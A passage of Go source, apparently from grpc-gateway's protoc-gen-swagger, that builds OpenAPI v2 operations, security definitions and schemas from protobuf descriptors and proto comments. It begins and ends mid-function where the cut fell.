parameters = append(parameters, swaggerParameterObject{
Name: "body",
Description: desc,
In: "body",
Required: true,
Schema: &schema,
})
} else if b.HTTPMethod == "GET" || b.HTTPMethod == "DELETE" {
// add the parameters to the query string
queryParams, err := messageToQueryParameters(meth.RequestType, reg, b.PathParams)
if err != nil {
return err
}
parameters = append(parameters, queryParams...)
}
pathItemObject, ok := paths[templateToSwaggerPath(b.PathTmpl.Template, reg, meth.RequestType.Fields, msgs)]
if !ok {
pathItemObject = swaggerPathItemObject{}
}
methProtoPath := protoPathIndex(reflect.TypeOf((*pbdescriptor.ServiceDescriptorProto)(nil)), "Method")
desc := "A successful response."
var responseSchema swaggerSchemaObject
if b.ResponseBody == nil || len(b.ResponseBody.FieldPath) == 0 {
responseSchema = swaggerSchemaObject{
schemaCore: schemaCore{},
}
// Don't link to a full definition for Empty;
// that is overly verbose. An empty
// schema.Properties renders the same way,
// without requiring a definition.
wknSchemaCore, isWkn := wktSchemas[meth.ResponseType.FQMN()]
if !isWkn {
err := responseSchema.setRefFromFQN(meth.ResponseType.FQMN(), reg)
if err != nil {
return err
}
} else {
responseSchema.schemaCore = wknSchemaCore
// Special workaround for Empty: it's a well-known type, but wknSchemas only provides schema.schemaCore; we also need to set schema.Properties, which lives a level higher.
if meth.ResponseType.FQMN() == ".google.protobuf.Empty" {
responseSchema.Properties = &swaggerSchemaObjectProperties{}
}
}
} else {
// This is resolving the value of response_body in the google.api.HttpRule
lastField := b.ResponseBody.FieldPath[len(b.ResponseBody.FieldPath)-1]
responseSchema = schemaOfField(lastField.Target, reg, customRefs)
if responseSchema.Description != "" {
desc = responseSchema.Description
} else {
desc = fieldProtoComments(reg, lastField.Target.Message, lastField.Target)
}
}
if meth.GetServerStreaming() {
desc += "(streaming responses)"
responseSchema.Type = "object"
swgRef, _ := fullyQualifiedNameToSwaggerName(meth.ResponseType.FQMN(), reg)
responseSchema.Title = "Stream result of " + swgRef
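// The wrapper built below describes the stream framing: each frame is,
// illustratively, {"result": <response message>} or {"error": <stream error>}.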
props := swaggerSchemaObjectProperties{
keyVal{
Key: "result",
Value: swaggerSchemaObject{
schemaCore: schemaCore{
Ref: responseSchema.Ref,
},
},
},
}
streamErrDef, hasStreamError := fullyQualifiedNameToSwaggerName(".grpc.gateway.runtime.StreamError", reg)
if hasStreamError {
props = append(props, keyVal{
Key: "error",
Value: swaggerSchemaObject{
schemaCore: schemaCore{
Ref: fmt.Sprintf("#/definitions/%s", streamErrDef)},
},
})
}
responseSchema.Properties = &props
responseSchema.Ref = ""
}
tag := svc.GetName()
if pkg := svc.File.GetPackage(); pkg != "" && reg.IsIncludePackageInTags() {
tag = pkg + "." + tag
}
operationObject := &swaggerOperationObject{
Tags: []string{tag},
Parameters: parameters,
Responses: swaggerResponsesObject{
"200": swaggerResponseObject{
Description: desc,
Schema: responseSchema,
},
},
}
if !reg.GetDisableDefaultErrors() {
errDef, hasErrDef := fullyQualifiedNameToSwaggerName(".grpc.gateway.runtime.Error", reg)
if hasErrDef {
// https://github.com/OAI/OpenAPI-Specification/blob/3.0.0/versions/2.0.md#responses-object
operationObject.Responses["default"] = swaggerResponseObject{
Description: "An unexpected error response",
Schema: swaggerSchemaObject{
schemaCore: schemaCore{
Ref: fmt.Sprintf("#/definitions/%s", errDef),
},
},
}
}
}
operationObject.OperationID = fmt.Sprintf("%s_%s", svc.GetName(), meth.GetName())
if reg.GetSimpleOperationIDs() {
operationObject.OperationID = fmt.Sprintf("%s", meth.GetName())
}
if bIdx != 0 {
// OperationID must be unique in an OpenAPI v2 definition.
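// For example (illustrative), the second binding of Svc.Method gets OperationID "Svc_Method2".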
operationObject.OperationID += strconv.Itoa(bIdx + 1)
}
// Fill reference map with referenced request messages
for _, param := range operationObject.Parameters {
if param.Schema != nil && param.Schema.Ref != "" {
requestResponseRefs[param.Schema.Ref] = struct{}{}
}
}
methComments := protoComments(reg, svc.File, nil, "Service", int32(svcIdx), methProtoPath, int32(methIdx))
if err := updateSwaggerDataFromComments(reg, operationObject, meth, methComments, false); err != nil {
panic(err)
}
opts, err := extractOperationOptionFromMethodDescriptor(meth.MethodDescriptorProto)
if opts != nil {
if err != nil {
panic(err)
}
operationObject.ExternalDocs = protoExternalDocumentationToSwaggerExternalDocumentation(opts.ExternalDocs, reg, meth)
// TODO(ivucica): this would be better supported by looking whether the method is deprecated in the proto file
operationObject.Deprecated = opts.Deprecated
if opts.Summary != "" {
operationObject.Summary = opts.Summary
}
if opts.Description != "" {
operationObject.Description = opts.Description
}
if len(opts.Tags) > 0 {
operationObject.Tags = make([]string, len(opts.Tags))
copy(operationObject.Tags, opts.Tags)
}
if opts.OperationId != "" {
operationObject.OperationID = opts.OperationId
}
if opts.Security != nil {
newSecurity := []swaggerSecurityRequirementObject{}
if operationObject.Security != nil {
newSecurity = *operationObject.Security
}
for _, secReq := range opts.Security {
newSecReq := swaggerSecurityRequirementObject{}
for secReqKey, secReqValue := range secReq.SecurityRequirement {
if secReqValue == nil {
continue
}
newSecReqValue := make([]string, len(secReqValue.Scope))
copy(newSecReqValue, secReqValue.Scope)
newSecReq[secReqKey] = newSecReqValue
}
if len(newSecReq) > 0 {
newSecurity = append(newSecurity, newSecReq)
}
}
operationObject.Security = &newSecurity
}
if opts.Responses != nil {
for name, resp := range opts.Responses {
// Merge response data into default response if available.
respObj := operationObject.Responses[name]
if resp.Description != "" {
respObj.Description = resp.Description
}
if resp.Schema != nil {
respObj.Schema = swaggerSchemaFromProtoSchema(resp.Schema, reg, customRefs, meth)
}
if resp.Examples != nil {
respObj.Examples = swaggerExamplesFromProtoExamples(resp.Examples)
}
if resp.Extensions != nil {
exts, err := processExtensions(resp.Extensions)
if err != nil {
return err
}
respObj.extensions = exts
}
operationObject.Responses[name] = respObj
}
}
if opts.Extensions != nil {
exts, err := processExtensions(opts.Extensions)
if err != nil {
return err
}
operationObject.extensions = exts
}
if len(opts.Produces) > 0 {
operationObject.Produces = make([]string, len(opts.Produces))
copy(operationObject.Produces, opts.Produces)
}
// TODO(ivucica): add remaining fields of operation object
}
switch b.HTTPMethod {
case "DELETE":
pathItemObject.Delete = operationObject
case "GET":
pathItemObject.Get = operationObject
case "POST":
pathItemObject.Post = operationObject
case "PUT":
pathItemObject.Put = operationObject
case "PATCH":
pathItemObject.Patch = operationObject
}
paths[templateToSwaggerPath(b.PathTmpl.Template, reg, meth.RequestType.Fields, msgs)] = pathItemObject
}
}
}
// Success! Return a nil error.
return nil
}
// This function is called with a param which contains the entire definition of a method.
func applyTemplate(p param) (*swaggerObject, error) {
// Create the basic template object. This is the object that everything is
// defined off of.
s := swaggerObject{
// Swagger 2.0 is the version of this document
Swagger: "2.0",
Consumes: []string{"application/json"},
Produces: []string{"application/json"},
Paths: make(swaggerPathsObject),
Definitions: make(swaggerDefinitionsObject),
Info: swaggerInfoObject{
Title: *p.File.Name,
Version: "version not set",
},
}
// Loops through all the services and their exposed GET/POST/PUT/DELETE definitions
// and create entries for all of them.
// Also adds custom user specified references to second map.
requestResponseRefs, customRefs := refMap{}, refMap{}
if err := renderServices(p.Services, s.Paths, p.reg, requestResponseRefs, customRefs, p.Messages); err != nil {
panic(err)
}
messages := messageMap{}
streamingMessages := messageMap{}
enums := enumMap{}
if !p.reg.GetDisableDefaultErrors() {
// Add the error type to the message map
runtimeError, swgRef, err := lookupMsgAndSwaggerName(".grpc.gateway.runtime", "Error", p.reg)
if err == nil {
messages[swgRef] = runtimeError
} else {
// just in case there is an error looking up runtimeError
glog.Error(err)
}
}
// Find all the service's messages and enumerations that are defined (recursively)
// and write request, response and other custom (but referenced) types out as definition objects.
findServicesMessagesAndEnumerations(p.Services, p.reg, messages, streamingMessages, enums, requestResponseRefs)
renderMessagesAsDefinition(messages, s.Definitions, p.reg, customRefs)
renderEnumerationsAsDefinition(enums, s.Definitions, p.reg)
// File itself might have some comments and metadata.
packageProtoPath := protoPathIndex(reflect.TypeOf((*pbdescriptor.FileDescriptorProto)(nil)), "Package")
packageComments := protoComments(p.reg, p.File, nil, "Package", packageProtoPath)
if err := updateSwaggerDataFromComments(p.reg, &s, p, packageComments, true); err != nil {
panic(err)
}
// There may be additional options in the swagger option in the proto.
spb, err := extractSwaggerOptionFromFileDescriptor(p.FileDescriptorProto)
if err != nil {
panic(err)
}
if spb != nil {
if spb.Swagger != "" {
s.Swagger = spb.Swagger
}
if spb.Info != nil {
if spb.Info.Title != "" {
s.Info.Title = spb.Info.Title
}
if spb.Info.Description != "" {
s.Info.Description = spb.Info.Description
}
if spb.Info.TermsOfService != "" {
s.Info.TermsOfService = spb.Info.TermsOfService
}
if spb.Info.Version != "" {
s.Info.Version = spb.Info.Version
}
if spb.Info.Contact != nil {
if s.Info.Contact == nil {
s.Info.Contact = &swaggerContactObject{}
}
if spb.Info.Contact.Name != "" {
s.Info.Contact.Name = spb.Info.Contact.Name
}
if spb.Info.Contact.Url != "" {
s.Info.Contact.URL = spb.Info.Contact.Url
}
if spb.Info.Contact.Email != "" {
s.Info.Contact.Email = spb.Info.Contact.Email
}
}
if spb.Info.License != nil {
if s.Info.License == nil {
s.Info.License = &swaggerLicenseObject{}
}
if spb.Info.License.Name != "" {
s.Info.License.Name = spb.Info.License.Name
}
if spb.Info.License.Url != "" {
s.Info.License.URL = spb.Info.License.Url
}
}
if spb.Info.Extensions != nil {
exts, err := processExtensions(spb.Info.Extensions)
if err != nil {
return nil, err
}
s.Info.extensions = exts
}
}
if spb.Host != "" {
s.Host = spb.Host
}
if spb.BasePath != "" {
s.BasePath = spb.BasePath
}
if len(spb.Schemes) > 0 {
s.Schemes = make([]string, len(spb.Schemes))
for i, scheme := range spb.Schemes {
s.Schemes[i] = strings.ToLower(scheme.String())
}
}
if len(spb.Consumes) > 0 {
s.Consumes = make([]string, len(spb.Consumes))
copy(s.Consumes, spb.Consumes)
}
if len(spb.Produces) > 0 {
s.Produces = make([]string, len(spb.Produces))
copy(s.Produces, spb.Produces)
}
if spb.SecurityDefinitions != nil && spb.SecurityDefinitions.Security != nil {
if s.SecurityDefinitions == nil {
s.SecurityDefinitions = swaggerSecurityDefinitionsObject{}
}
for secDefKey, secDefValue := range spb.SecurityDefinitions.Security {
var newSecDefValue swaggerSecuritySchemeObject
if oldSecDefValue, ok := s.SecurityDefinitions[secDefKey]; !ok {
newSecDefValue = swaggerSecuritySchemeObject{}
} else {
newSecDefValue = oldSecDefValue
}
if secDefValue.Type != swagger_options.SecurityScheme_TYPE_INVALID {
switch secDefValue.Type {
case swagger_options.SecurityScheme_TYPE_BASIC:
newSecDefValue.Type = "basic"
case swagger_options.SecurityScheme_TYPE_API_KEY:
newSecDefValue.Type = "apiKey"
case swagger_options.SecurityScheme_TYPE_OAUTH2:
newSecDefValue.Type = "oauth2"
}
}
if secDefValue.Description != "" {
newSecDefValue.Description = secDefValue.Description
}
if secDefValue.Name != "" {
newSecDefValue.Name = secDefValue.Name
}
if secDefValue.In != swagger_options.SecurityScheme_IN_INVALID {
switch secDefValue.In {
case swagger_options.SecurityScheme_IN_QUERY:
newSecDefValue.In = "query"
case swagger_options.SecurityScheme_IN_HEADER:
newSecDefValue.In = "header"
}
}
if secDefValue.Flow != swagger_options.SecurityScheme_FLOW_INVALID {
switch secDefValue.Flow {
case swagger_options.SecurityScheme_FLOW_IMPLICIT:
newSecDefValue.Flow = "implicit"
case swagger_options.SecurityScheme_FLOW_PASSWORD:
newSecDefValue.Flow = "password"
case swagger_options.SecurityScheme_FLOW_APPLICATION:
newSecDefValue.Flow = "application"
case swagger_options.SecurityScheme_FLOW_ACCESS_CODE:
newSecDefValue.Flow = "accessCode"
}
}
if secDefValue.AuthorizationUrl != "" {
newSecDefValue.AuthorizationURL = secDefValue.AuthorizationUrl
}
if secDefValue.TokenUrl != "" {
newSecDefValue.TokenURL = secDefValue.TokenUrl
}
if secDefValue.Scopes != nil {
if newSecDefValue.Scopes == nil {
newSecDefValue.Scopes = swaggerScopesObject{}
}
for scopeKey, scopeDesc := range secDefValue.Scopes.Scope {
newSecDefValue.Scopes[scopeKey] = scopeDesc
}
}
if secDefValue.Extensions != nil {
exts, err := processExtensions(secDefValue.Extensions)
if err != nil {
return nil, err
}
newSecDefValue.extensions = exts
}
s.SecurityDefinitions[secDefKey] = newSecDefValue
}
}
if spb.Security != nil {
newSecurity := []swaggerSecurityRequirementObject{}
if s.Security == nil {
newSecurity = []swaggerSecurityRequirementObject{}
} else {
newSecurity = s.Security
}
for _, secReq := range spb.Security {
newSecReq := swaggerSecurityRequirementObject{}
for secReqKey, secReqValue := range secReq.SecurityRequirement {
newSecReqValue := make([]string, len(secReqValue.Scope))
copy(newSecReqValue, secReqValue.Scope)
newSecReq[secReqKey] = newSecReqValue
}
newSecurity = append(newSecurity, newSecReq)
}
s.Security = newSecurity
}
s.ExternalDocs = protoExternalDocumentationToSwaggerExternalDocumentation(spb.ExternalDocs, p.reg, spb)
// Populate all Paths with the Responses set at the top level,
// preferring Responses already set on an operation over the top-level ones.
if spb.Responses != nil {
for _, verbs := range s.Paths {
var maps []swaggerResponsesObject
if verbs.Delete != nil {
maps = append(maps, verbs.Delete.Responses)
}
if verbs.Get != nil {
maps = append(maps, verbs.Get.Responses)
}
if verbs.Post != nil {
maps = append(maps, verbs.Post.Responses)
}
if verbs.Put != nil {
maps = append(maps, verbs.Put.Responses)
}
if verbs.Patch != nil {
maps = append(maps, verbs.Patch.Responses)
}
for k, v := range spb.Responses {
for _, respMap := range maps {
if _, ok := respMap[k]; ok {
// Don't overwrite already existing Responses
continue
}
respMap[k] = swaggerResponseObject{
Description: v.Description,
Schema: swaggerSchemaFromProtoSchema(v.Schema, p.reg, customRefs, nil),
Examples: swaggerExamplesFromProtoExamples(v.Examples),
}
}
}
}
}
if spb.Extensions != nil {
exts, err := processExtensions(spb.Extensions)
if err != nil {
return nil, err
}
s.extensions = exts
}
// Additional fields on the OpenAPI v2 spec's "Swagger" object
// should be added here, once supported in the proto.
}
// Finally add any references added by users that aren't
// otherwise rendered.
addCustomRefs(s.Definitions, p.reg, customRefs)
return &s, nil
}
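// For example (illustrative), the extension map {"x-a": ..., "x-b": ...} is
// returned as a slice of extensions sorted by key; any key that does not
// start with "x-" is rejected with an error.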
func processExtensions(inputExts map[string]*structpb.Value) ([]extension, error) {
exts := []extension{}
for k, v := range inputExts {
if !strings.HasPrefix(k, "x-") {
return nil, fmt.Errorf("Extension keys need to start with \"x-\": %q", k)
}
ext, err := (&jsonpb.Marshaler{Indent: " "}).MarshalToString(v)
if err != nil {
return nil, err
}
exts = append(exts, extension{key: k, value: json.RawMessage(ext)})
}
sort.Slice(exts, func(i, j int) bool { return exts[i].key < exts[j].key })
return exts, nil
}
// updateSwaggerDataFromComments updates a Swagger object based on a comment
// from the proto file.
//
// First paragraph of a comment is used for summary. Remaining paragraphs of
// a comment are used for description. If 'Summary' field is not present on
// the passed swaggerObject, the summary and description are joined by \n\n.
//
// If there is a field named 'Info', its 'Summary' and 'Description' fields
// will be updated instead.
//
// If there is no 'Summary', the same behavior will be attempted on 'Title',
// but only if the last character is not a period.
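// For example (illustrative), the comment
//
//	"Gets a user.
//
//	Looks the user up by ID."
//
// yields Summary "Gets a user." and Description "Looks the user up by ID."
// on objects that carry a Summary field.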
func updateSwaggerDataFromComments(reg *descriptor.Registry, swaggerObject interface{}, data interface{}, comment string, isPackageObject bool) error {
if len(comment) == 0 {
return nil
}
// Checks whether the "use_go_templates" flag is set to true
if reg.GetUseGoTemplate() {
comment = goTemplateComments(comment, data, reg)
}
// Figure out what to apply changes to.
swaggerObjectValue := reflect.ValueOf(swaggerObject)
infoObjectValue := swaggerObjectValue.Elem().FieldByName("Info")
if !infoObjectValue.CanSet() {
// No such field? Apply summary and description directly to
// passed object.
infoObjectValue = swaggerObjectValue.Elem()
}
// Figure out which properties to update.
summaryValue := infoObjectValue.FieldByName("Summary")
descriptionValue := infoObjectValue.FieldByName("Description")
readOnlyValue := infoObjectValue.FieldByName("ReadOnly")
if readOnlyValue.Kind() == reflect.Bool && readOnlyValue.CanSet() && strings.Contains(comment, "Output only.") {
readOnlyValue.Set(reflect.ValueOf(true))
}
usingTitle := false
if !summaryValue.CanSet() {
summaryValue = infoObjectValue.FieldByName("Title")
usingTitle = true
}
paragraphs := strings.Split(comment, "\n\n")
// If there is a settable summary (or summary-equivalent) field, use the first
// paragraph as the summary and the remaining paragraphs as the description.
if summaryValue.CanSet() {
summary := strings.TrimSpace(paragraphs[0])
description := strings.TrimSpace(strings.Join(paragraphs[1:], "\n\n"))
if !usingTitle || (len(summary) > 0 && summary[len(summary)-1] != '.') {
// overrides the schema value only if it's empty
// keep the comment precedence when updating the package definition
if summaryValue.Len() == 0 || isPackageObject {
summaryValue.Set(reflect.ValueOf(summary))
}
if len(description) > 0 {
if !descriptionValue.CanSet() {
return fmt.Errorf("Encountered object type with a summary, but no description")
}
// overrides the schema value only if it's empty
// keep the comment precedence when updating the package definition
if descriptionValue.Len() == 0 || isPackageObject {
descriptionValue.Set(reflect.ValueOf(description))
}
}
return nil
}
}
// There was no summary field on the swaggerObject. Try to apply the
// whole comment into description if the swagger object description is empty.
if descriptionValue.CanSet() {
if descriptionValue.Len() == 0 || isPackageObject {
descriptionValue.Set(reflect.ValueOf(strings.Join(paragraphs, "\n\n")))
}
return nil
}
return fmt.Errorf("no description nor summary property")
}
func fieldProtoComments(reg *descriptor.Registry, msg *descriptor.Message, field *descriptor.Field) string {
protoPath := protoPathIndex(reflect.TypeOf((*pbdescriptor.DescriptorProto)(nil)), "Field")
for i, f := range msg.Fields {
if f == field {
return protoComments(reg, msg.File, msg.Outers, "MessageType", int32(msg.Index), protoPath, int32(i))
}
}
return ""
}
func enumValueProtoComments(reg *descriptor.Registry, enum *descriptor.Enum) string {
protoPath := protoPathIndex(reflect.TypeOf((*pbdescriptor.EnumDescriptorProto)(nil)), "Value")
var comments []string
for idx, value := range enum.GetValue() {
name := value.GetName()
if reg.GetEnumsAsInts() {
name = strconv.Itoa(int(value.GetNumber()))
}
str := protoComments(reg, enum.File, enum.Outers, "EnumType", int32(enum.Index), protoPath, int32(idx))
if str != "" {
comments = append(comments, name+": "+str)
}
}
if len(comments) > 0 {
return "- " + strings.Join(comments, "\n - ")
}
return ""
}
func protoComments(reg *descriptor.Registry, file *descriptor.File, outers []string, typeName string, typeIndex int32, fieldPaths ...int32) string {
if file.SourceCodeInfo == nil {
fmt.Fprintln(os.Stderr, "descriptor.File should not contain nil SourceCodeInfo")
return ""
}
outerPaths := make([]int32, len(outers))
for i := range outers {
location := ""
if file.Package != nil {
location = file.GetPackage()
}
msg, err := reg.LookupMsg(location, strings.Join(outers[:i+1], "."))
if err != nil {
panic(err)
}
outerPaths[i] = int32(msg.Index)
}
for _, loc := range file.SourceCodeInfo.Location {
if !isProtoPathMatches(loc.Path, outerPaths, typeName, typeIndex, fieldPaths) {
continue
}
comments := ""
if loc.LeadingComments != nil {
comments = strings.TrimRight(*loc.LeadingComments, "\n")
comments = strings.TrimSpace(comments)
// TODO(ivucica): this is a hack to fix "// " being interpreted as "//".
// perhaps we should:
// - split by \n
// - determine if every (but first and last) line begins with " "
// - trim every line only if that is the case
// - join by \n
comments = strings.Replace(comments, "\n ", "\n", -1)
}
return comments
}
return ""
}
func goTemplateComments(comment string, data interface{}, reg *descriptor.Registry) string {
var temp bytes.Buffer
tpl, err := template.New("").Funcs(template.FuncMap{
// Allows importing documentation from a file
"import": func(name string) string {
file, err := ioutil.ReadFile(name)
if err != nil {
return err.Error()
}
// Runs template over imported file
return goTemplateComments(string(file), data, reg)
},
// Grabs title and description from a field
"fieldcomments": func(msg *descriptor.Message, field *descriptor.Field) string {
return strings.Replace(fieldProtoComments(reg, msg, field), "\n", "<br>", -1)
},
}).Parse(comment)
if err != nil {
// If there is an error parsing the templating insert the error as string in the comment
// to make it easier to debug the template error
return err.Error()
}
err = tpl.Execute(&temp, data)
if err != nil {
// If there is an error executing the templating insert the error as string in the comment
// to make it easier to debug the error
return err.Error()
}
return temp.String()
}
var messageProtoPath = protoPathIndex(reflect.TypeOf((*pbdescriptor.FileDescriptorProto)(nil)), "MessageType")
var nestedProtoPath = protoPathIndex(reflect.TypeOf((*pbdescriptor.DescriptorProto)(nil)), "NestedType")
var packageProtoPath = protoPathIndex(reflect.TypeOf((*pbdescriptor.FileDescriptorProto)(nil)), "Package")
var serviceProtoPath = protoPathIndex(reflect.TypeOf((*pbdescriptor.FileDescriptorProto)(nil)), "Service")
var methodProtoPath = protoPathIndex(reflect.TypeOf((*pbdescriptor.ServiceDescriptorProto)(nil)), "Method")
func isProtoPathMatches(paths []int32, outerPaths []int32, typeName string, typeIndex int32, fieldPaths []int32) bool {
if typeName == "Package" && typeIndex == packageProtoPath {
// path for package comments is just [2], and all the other processing
// is too complex for it.
if len(paths) == 0 || typeIndex != paths[0] {
return false
}
return true
}
if len(paths) != len(outerPaths)*2+2+len(fieldPaths) {
return false
}
if typeName == "Method" {
if paths[0] != serviceProtoPath || paths[2] != methodProtoPath {
return false
}
paths = paths[2:]
} else {
typeNameDescriptor := reflect.TypeOf((*pbdescriptor.FileDescriptorProto)(nil))
if len(outerPaths) > 0 {
if paths[0] != messageProtoPath || paths[1] != outerPaths[0] {
return false
}
paths = paths[2:]
outerPaths = outerPaths[1:]
for i, v := range outerPaths {
if paths[i*2] != nestedProtoPath || paths[i*2+1] != v {
return false
}
}
paths = paths[len(outerPaths)*2:]
if typeName == "MessageType" {
typeName = "NestedType"
}
typeNameDescriptor = reflect.TypeOf((*pbdescriptor.DescriptorProto)(nil))
}
if paths[0] != protoPathIndex(typeNameDescriptor, typeName) || paths[1] != typeIndex {
return false
}
paths = paths[2:]
}
for i, v := range fieldPaths {
if paths[i] != v {
return false
}
}
return true
}
// protoPathIndex returns a path component for google.protobuf.descriptor.SourceCode_Location.
//
// Specifically, it returns an id as generated from descriptor proto which
// can be used to determine what type the id following it in the path is.
// For example, if we are trying to locate comments related to a field named
// `Address` in a message named `Person`, the path will be:
//
// [4, a, 2, b]
//
// While `a` gets determined by the order in which the messages appear in
// the proto file, and `b` is the field index specified in the proto
// file itself, the path actually needs to specify that `a` refers to a
// message and not, say, a service; and that `b` refers to a field and not
// an option.
//
// protoPathIndex figures out the values 4 and 2 in the above example. Because
// messages are top level objects, the value of 4 comes from field id for
// `MessageType` inside `google.protobuf.descriptor.FileDescriptor` message.
// This field has a message type `google.protobuf.descriptor.DescriptorProto`.
// And inside message `DescriptorProto`, there is a field named `Field` with id
// 2.
//
// Some code generators seem to be hardcoding these values; this method instead
// interprets them from `descriptor.proto`-derived Go source as necessary.
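// For example (illustrative, matching the field ids in descriptor.proto):
//
//	protoPathIndex(reflect.TypeOf((*pbdescriptor.FileDescriptorProto)(nil)), "MessageType") // 4
//	protoPathIndex(reflect.TypeOf((*pbdescriptor.DescriptorProto)(nil)), "Field")          // 2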
func protoPathIndex(descriptorType reflect.Type, what string) int32 {
field, ok := descriptorType.Elem().FieldByName(what)
if !ok {
panic(fmt.Errorf("could not find protobuf descriptor type id for %s", what))
}
pbtag := field.Tag.Get("protobuf")
if pbtag == "" {
panic(fmt.Errorf("no Go tag 'protobuf' on protobuf descriptor for %s", what))
}
path, err := strconv.Atoi(strings.Split(pbtag, ",")[1])
if err != nil {
panic(fmt.Errorf("protobuf descriptor id for %s cannot be converted to a number: %s", what, err.Error()))
}
return int32(path)
}
// extractOperationOptionFromMethodDescriptor extracts the message of type
// swagger_options.Operation from a given proto method's descriptor.
func extractOperationOptionFromMethodDescriptor(meth *pbdescriptor.MethodDescriptorProto) (*swagger_options.Operation, error) {
if meth.Options == nil {
return nil, nil
}
if !proto.HasExtension(meth.Options, swagger_options.E_Openapiv2Operation) {
return nil, nil
}
ext, err := proto.GetExtension(meth.Options, swagger_options.E_Openapiv2Operation)
if err != nil {
return nil, err
}
opts, ok := ext.(*swagger_options.Operation)
if !ok {
return nil, fmt.Errorf("extension is %T; want an Operation", ext)
}
return opts, nil
}
// extractSchemaOptionFromMessageDescriptor extracts the message of type
// swagger_options.Schema from a given proto message's descriptor.
func extractSchemaOptionFromMessageDescriptor(msg *pbdescriptor.DescriptorProto) (*swagger_options.Schema, error) {
if msg.Options == nil {
return nil, nil
}
if !proto.HasExtension(msg.Options, swagger_options.E_Openapiv2Schema) {
return nil, nil
}
ext, err := proto.GetExtension(msg.Options, swagger_options.E_Openapiv2Schema)
if err != nil {
return nil, err
}
opts, ok := ext.(*swagger_options.Schema)
if !ok {
return nil, fmt.Errorf("extension is %T; want a Schema", ext)
}
return opts, nil
}
// extractSwaggerOptionFromFileDescriptor extracts the message of type
// swagger_options.Swagger from a given proto method's descriptor.
func extractSwaggerOptionFromFileDescriptor(file *pbdescriptor.FileDescriptorProto) (*swagger_options.Swagger, error) {
if file.Options == nil {
return nil, nil
}
if !proto.HasExtension(file.Options, swagger_options.E_Openapiv2Swagger) {
return nil, nil
}
ext, err := proto.GetExtension(file.Options, swagger_options.E_Openapiv2Swagger)
if err != nil {
return nil, err
}
opts, ok := ext.(*swagger_options.Swagger)
if !ok {
return nil, fmt.Errorf("extension is %T; want a Swagger object", ext)
}
return opts, nil
}
func extractJSONSchemaFromFieldDescriptor(fd *pbdescriptor.FieldDescriptorProto) (*swagger_options.JSONSchema, error) {
if fd.Options == nil {
return nil, nil
}
if !proto.HasExtension(fd.Options, swagger_options.E_Openapiv2Field) {
return nil, nil
}
ext, err := proto.GetExtension(fd.Options, swagger_options.E_Openapiv2Field)
if err != nil {
return nil, err
}
opts, ok := ext.(*swagger_options.JSONSchema)
if !ok {
return nil, fmt.Errorf("extension is %T; want a JSONSchema object", ext)
}
return opts, nil
}
func protoJSONSchemaToSwaggerSchemaCore(j *swagger_options.JSONSchema, reg *descriptor.Registry, refs refMap) schemaCore {
ret := schemaCore{}
if j.GetRef() != "" {
swaggerName, ok := fullyQualifiedNameToSwaggerName(j.GetRef(), reg)
if ok {
ret.Ref = "#/definitions/" + swaggerName
if refs != nil {
refs[j.GetRef()] = struct{}{}
}
} else {
ret.Ref += j.GetRef()
}
} else {
f, t := protoJSONSchemaTypeToFormat(j.GetType())
ret.Format = f
ret.Type = t
}
return ret
}
func updateSwaggerObjectFromJSONSchema(s *swaggerSchemaObject, j *swagger_options.JSONSchema, reg *descriptor.Registry, data interface{}) {
s.Title = j.GetTitle()
s.Description = j.GetDescription()
if reg.GetUseGoTemplate() {
s.Title = goTemplateComments(s.Title, data, reg)
s.Description = goTemplateComments(s.Description, data, reg)
}
s.ReadOnly = j.GetReadOnly()
s.MultipleOf = j.GetMultipleOf()
s.Maximum = j.GetMaximum()
s.ExclusiveMaximum = j.GetExclusiveMaximum()
s.Minimum = j.GetMinimum()
s.ExclusiveMinimum = j.GetExclusiveMinimum()
s.MaxLength = j.GetMaxLength()
s.MinLength = j.GetMinLength()
s.Pattern = j.GetPattern()
s.Default = j.GetDefault()
s.MaxItems = j.GetMaxItems()
s.MinItems = j.GetMinItems()
s.UniqueItems = j.GetUniqueItems()
s.MaxProperties = j.GetMaxProperties()
s.MinProperties = j.GetMinProperties()
s.Required = j.GetRequired()
if overrideType := j.GetType(); len(overrideType) > 0 {
s.Type = strings.ToLower(overrideType[0].String())
}
}
func swaggerSchemaFromProtoSchema(s *swagger_options.Schema, reg *descriptor.Registry, refs refMap, data interface{}) swaggerSchemaObject {
ret := swaggerSchemaObject{
ExternalDocs: protoExternalDocumentationToSwaggerExternalDocumentation(s.GetExternalDocs(), reg, data),
}
ret.schemaCore = protoJSONSchemaToSwaggerSchemaCore(s.GetJsonSchema(), reg, refs)
updateSwaggerObjectFromJSONSchema(&ret, s.GetJsonSchema(), reg, data)
if s != nil && s.Example != nil {
ret.Example = json.RawMessage(s.Example.Value)
}
return ret
}
func swaggerExamplesFromProtoExamples(in map[string]string) map[string]interface{} {
if len(in) == 0 {
return nil
}
out := make(map[string]interface{})
for mimeType, exampleStr := range in {
switch mimeType {
case "application/json":
// JSON example objects are rendered raw.
out[mimeType] = json.RawMessage(exampleStr)
default:
// All other mimetype examples are rendered as strings.
out[mimeType] = exampleStr
}
}
return out
}
func protoJSONSchemaTypeToFormat(in []swagger_options.JSONSchema_JSONSchemaSimpleTypes) (string, string) {
if len(in) == 0 {
return "", ""
}
// Can't support more than 1 type, just return the first element.
// This is due to an inconsistency in the design of the openapiv2 proto
// and that used in schemaCore. schemaCore uses the v3 definition of types,
// which only allows a single string, while the openapiv2 proto uses the OpenAPI v2
// definition, which defers to the JSON schema definition, which allows a string or an array.
// Sources:
// https://swagger.io/specification/#itemsObject
// https://tools.ietf.org/html/draft-fge-json-schema-validation-00#section-5.5.2
switch in[0] {
case swagger_options.JSONSchema_UNKNOWN, swagger_options.JSONSchema_NULL:
return "", ""
case swagger_options.JSONSchema_OBJECT:
return "object", ""
case swagger_options.JSONSchema_ARRAY:
return "array", ""
case swagger_options.JSONSchema_BOOLEAN:
return "boolean", "boolean"
case swagger_options.JSONSchema_INTEGER:
return "integer", "int32"
case swagger_options.JSONSchema_NUMBER:
return "number", "double"
case swagger_options.JSONSchema_STRING:
// NOTE: in the swagger specification, format should be empty for the string type
return "string", ""
default:
// Maybe panic?
return "", ""
}
}
func protoExternalDocumentationToSwaggerExternalDocumentation(in *swagger_options.ExternalDocumentation, reg *descriptor.Registry, data interface{}) *swaggerExternalDocumentationObject {
if in == nil {
return nil
}
if reg.GetUseGoTemplate() {
in.Description = goTemplateComments(in.Description, data, reg)
}
return &swaggerExternalDocumentationObject{
Description: in.Description,
URL: in.Url,
}
}
func addCustomRefs(d swaggerDefinitionsObject, reg *descriptor.Registry, refs refMap) {
if len(refs) == 0 {
return
}
msgMap := make(messageMap)
enumMap := make(enumMap)
for ref := range refs {
